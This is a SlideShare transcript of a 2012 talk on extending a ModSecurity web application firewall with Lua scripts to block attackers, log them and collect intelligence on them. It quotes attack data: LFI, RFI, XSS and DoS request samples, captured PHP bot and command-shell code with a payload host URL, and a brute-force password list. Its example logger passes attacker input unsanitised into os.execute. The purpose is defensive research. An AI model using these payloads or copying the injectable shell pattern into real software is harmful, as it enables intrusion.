State of Web App Security 2012State of Web App Security 2012
State of Web App Security 2012Robert Rowley
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 

Mehr von Robert Rowley (7)

WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceDetecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor Surveillance
 
Privacy; Past, Present and Future
Privacy; Past, Present and FuturePrivacy; Past, Present and Future
Privacy; Past, Present and Future
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101
 
State of Web App Security 2012
State of Web App Security 2012State of Web App Security 2012
State of Web App Security 2012
 
Juice Jacking 101
Juice Jacking 101Juice Jacking 101
Juice Jacking 101
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
 

Kürzlich hochgeladen

AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...apidays
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbuapidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 

Kürzlich hochgeladen (20)

AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 

Teaching Your WAF New Tricks

  • 1. © 2012 Presented by: Teaching your WAF new tricks Robert Rowley Security Researcher rrowley@trustwave.com
  • 2. © 2012 Disclaimer: The scripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault. Harass me on twitter: @iamlei
  • 3. © 2012 Agenda • Preamble – Writing a normal rule – Lua introduction – Scripting with: exec, @inspectFile, SecRuleScript • Counter Intelligence – RFI hunting/gathering – Malicious request intelligence collection – That WordPress Incident
  • 5. © 2012 Mod sec intro  Write a rule  Block, Log, Repeat  Apache  IIS, Nginx (Beta)
  • 7. © 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ...
  • 8. © 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 100” deny
  • 9. © 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 1000” deny
  • 11. © 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
  • 12. © 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
  • 13. © 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny Blocks: 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>”
  • 14. © 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny
  • 15. © 2012 Not So Normal Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny,exec:dirty_firewaller.lua
  • 16. © 2012 A little lua intro  Object oriented (Everything is a table)  Light and easy  Available in other tools – Nmap – Wireshark – WoW
  • 17. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 18. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 19. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 20. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:htaccess_firewaller.lua --- htaccess_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) local fh = io.open(“/path/to/.htaccess”, a+) fh:write(“deny from “..bad_ip) fh:close() end
  • 21. © 2012 Using @inspectFile SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny
  • 22. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 23. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 24. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 25. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 26. © 2012 SpiderLabs making it awesome • Implemented their own AV detection using ClamAV • It’s in the spiderlabs github • https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/ runav.pl
  • 27. © 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny
  • 28. © 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
  • 29. © 2012 Matching With Scripts SecRule REQUEST_URI “admin” deny,chain SecRuleScript “check_blacklist.lua” --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
  • 30. © 2012 SpiderLabs making it awesome #2 “ipMatchFromFile” implemented in release 2.7 SecRule REQUEST_URI “admin” deny,chain SecRule ‘@ipMatchFromFile blacklist.txt’
  • 31. © 2012© 2012 Counter Intelligence
  • 32. © 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Trivial to pull from logs
  • 33. © 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Problem …
  • 34. © 2012 rfi_logger.lua SecRule ARGS “^http://” allow,exec:rfi_logger.lua function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") for j = 1, #args do if(string.match(args[j].value, 'http')) then fh = io.open("/tmp/backdoor", "a") fh:write("---"..ip.." "..url.." "..args[j].name.."="..args[j].value.."---n") fh:close() os.execute("wget –q –x -P /tmp/rfi_files/ '"..args[j].value) end end end
  • 35. © 2012 <?php ###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]### error_reporting(0); ##### CONFIG ##### $mode = $_GET["mode"]; $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path $src = $url.'cmd'; //Source Shell $shell = '404.php'; //Backdoor PHPShell name $bot = $url.'bot'; //Source PHPBot ##### SPREAD ##### ... die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! } ... It works
  • 36. © 2012 <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php ... function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } ... It works
  • 37. © 2012 Better than a blacklist 1) Capture Request 2) Log IP Malicious Request WAF script
  • 38. © 2012 Better than a blacklist Request WAF script Unobstructed Response 1) Capture Request 2) Log All Data Malicious Host Unknown Host
  • 39. © 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua
  • 40. © 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua --- blacklist_ip.lua --- function main() local ip = m.getvar("REMOTE_ADDR") fh = io.open("blacklist.txt", "a") fh:write(ip.."n") fh:close() end
  • 41. © 2012 Put it together SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua --- uber_logger.lua --- function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") local headers = m.getvars("REQUEST_HEADERS") local logstring = " " for j = 1, #headers do logstring = logstring.." "..headers[j].name.."="..headers[j].value end for j = 1, #args do logstring = logstring.." "..args[j].name.."="..args[j].value end fh = io.open("/tmp/uberlog", "a+") fh:write(ip.." "..url.." "..logstring.."n") fh:close() end
  • 42. © 2012 Put it together Uberlog data 69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script> 69.110.217.76 /index.php?-s REQUEST_HEADERS:User- Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
  • 43. © 2012 Data Mining Capture only on malicious requests Log far more data – REQUEST_HEADERS – POST variables – COOKIE data – FILES uploaded in the request – GeoIP information – Live data on the attack – Make pretty* graphs * OK they are not that pretty
  • 47. © 2012 The WordPress Incident (Monitoring Brute Force Attacks) “Massive” WordPress attack in early April 2013. Reported by several Hosting providers as reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run. Coincidentally: I had been monitoring wp-login.php requests with full data for months.
  • 48. © 2012 The WordPress Incident (Why was I logging?) Someone* complained on twitter** Their logs looked like this: POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php They wanted to know more. * it was @Viss ** First time ever that complaining on twitter was beneficial, but not to the complainer.
  • 49. © 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua
  • 50. © 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111 x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
  • 51. © 2012 The WordPress Incident (Data I got) Password list of the brute force Frequency of attacks against sites I controlled Passwords naruto pokemon 123456 admin Sitename123 etc... Correlated with the data from other researchers
  • 52. © 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
  • 53. © 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
  • 54. © 2012 Bibliography/Questions?  http://www.modsecurity.org  http://www.lua.org  http://blog.spiderlabs.com SpiderLabs github  https://github.com/SpiderLabs You seriously want my code?  https://github.com/rawrly/ModSecScripts Take your pitchfork to me on twitter: @iamlei